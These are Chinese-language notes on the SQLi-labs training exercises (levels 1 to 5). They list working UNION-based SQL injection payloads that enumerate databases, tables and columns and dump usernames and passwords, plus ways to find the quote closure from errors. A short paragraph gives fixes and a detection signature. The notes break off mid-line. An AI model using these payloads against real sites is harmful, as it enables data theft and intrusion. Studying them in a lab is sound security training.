less-1
- 爆庫
id=1222' union select 1,group_concat(schema_name),database() from information_schema.schemata --+#
- 爆表
?id=1222' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- #
- 爆字段
— 缺,下面 less-2 有
- 爆數據
?id=123' union select 1,group_concat(username),group_concat(password) from users --+#
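流程:查數據庫名 -> 查表名 -> 查字段名 -> 查數據
利用 group_concat() 函數,可在一個顯示位中一次輸出多行數據
這類聯合查詢注入的前提是 id 參數被直接拼接進 SQL 語句;改用參數化查詢(預編譯語句)並按最小權限配置數據庫賬號即可消除注入點,日誌中出現帶 union select 與 information_schema 的請求參數也可作爲檢測特徵。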
less-2
- 追加 and 1=2 後無數據返回,判斷爲數字型注入(id 未被引號包裹)
- 爆數據庫
?id=22222 union select 1,group_concat(schema_name),1 from information_schema.schemata
- 爆表
?id=22222 union select 1,group_concat(table_name),1 from information_schema.tables where table_schema=database()
- 爆字段
?id=22222 union select 1,group_concat(column_name),1 from information_schema.columns where table_name='uagents'
- 爆數據
?id=22222 union select 1,group_concat(uagent),group_concat(ip_address) from uagents
結果爲空
less-3
- 題目提示輸入數據
- and 1=2、and 1=1 均無反應;?id=1 ' 報錯
從報錯可看出閉合爲 ')
?id=3 ') -- #
爆庫
?id=555 ') union select 1,2,group_concat(schema_name) from information_schema.schemata -- #
less-4
嘗試:在 ?id=1 後分別追加 ' 和 "
閉合爲 ")
?id=5555 ") union select database(),database(),user()-- #
爆此數據庫表
?id=5555 ") union select 1,1,group_concat(table_name) from information_schema.tables where table_schema = database() -- #
less-5
?id=2'
閉合爲單引號 '
但?id=2’ – #